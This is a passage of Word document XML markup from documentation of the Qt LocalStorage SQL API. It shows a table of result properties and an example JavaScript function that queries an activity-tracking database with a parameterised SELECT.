                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Applicability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidTr="0068181D">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rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>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rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>rows.length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835"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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The number of rows in the result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835"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rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SELECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidTr="0068181D">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68181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>var</w:t>
            </w:r>
          </w:p>
        </w:tc>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68181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>rows.item(i)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835"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68181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Function that returns row</w:t>
            </w:r>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>of the result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835"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68181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SELECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidTr="0068181D">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rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>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464480" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00464480">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>rowsAffected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835"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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The number of rows affected by a modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835"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8181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>UPDATE, DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidTr="0068181D">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68181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>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464480" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00464480">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>insertId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835"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68181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The id of the row inserted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835"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68181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>INSERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0068181D" w:rsidRPr="008F1DE7" w:rsidRDefault="0068181D" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">May throw exception with code property </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLException.DATABASE_ERR, SQLException.SYNTAX_ERR, or SQLException.UNKNOWN_ERR</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F1DE7" w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00464480" w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu them.</w:t>
      </w:r>
      <w:r w:rsidR="008F1DE7" w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See below for an example:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Retrieve activity date, description and distance based on minimum</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// distance parameter Pdistance</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> db_distance_select</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pdistance</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> db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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LocalStorage</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openDatabaseSync</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"ActivityTrackDB"</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Database tracking sports activities"</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1000000</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db</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transaction</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function</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tx</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w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> results </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 xml:space="preserve"> tx</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>executeSql</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'SELECT rowid,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D"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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                            date,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D"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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                            trip_desc,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D"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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                            distance FROM trip_log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D"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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                     where distance &gt;= ?'</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,[</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pdistance</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        for (var i = 0; i &lt; results.rows.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D"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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            listModel.append({"id": results.rows.item(i).rowid,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D"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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                              "date": results.rows.item(i).date,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D"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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                              "trip_desc": results.rows.item(i).trip_desc,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D"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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                              "distance": results.rows.item(i).distance});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="00F413C2"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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F413C2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1370" w:name="method-documentation"/>
      <w:bookmarkStart w:id="1371" w:name="_Toc483000824"/>
      <w:bookmarkStart w:id="1372" w:name="_Toc483003817"/>
      <w:bookmarkStart w:id="1373" w:name="_Toc483604170"/>
      <w:bookmarkStart w:id="1374" w:name="_Toc483605390"/>
      <w:bookmarkEnd w:id="1370"/>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Method Documentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1371"/>
      <w:bookmarkEnd w:id="1372"/>
      <w:bookmarkEnd w:id="1373"/>
      <w:bookmarkEnd w:id="1374"/>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1375" w:name="opendatabasesync"/>
      <w:bookmarkEnd w:id="1375"/>
